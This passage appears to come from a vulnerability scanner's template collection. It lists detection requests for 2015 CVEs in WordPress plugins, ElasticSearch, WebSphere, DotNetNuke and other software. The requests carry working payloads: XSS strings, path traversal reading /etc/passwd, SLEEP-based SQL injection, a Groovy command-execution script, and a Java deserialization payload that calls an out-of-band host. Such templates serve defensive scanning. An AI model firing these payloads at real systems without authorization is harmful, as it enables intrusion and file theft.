Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2794","info":{"name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Administrative Information","Database Information"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SourceAfrica","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Symposium","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-20067","info":{"name":"WP Attachment Export < 0.2.4 - Unrestricted File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true","{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/xml\")","contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")"],"condition":"and"}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL 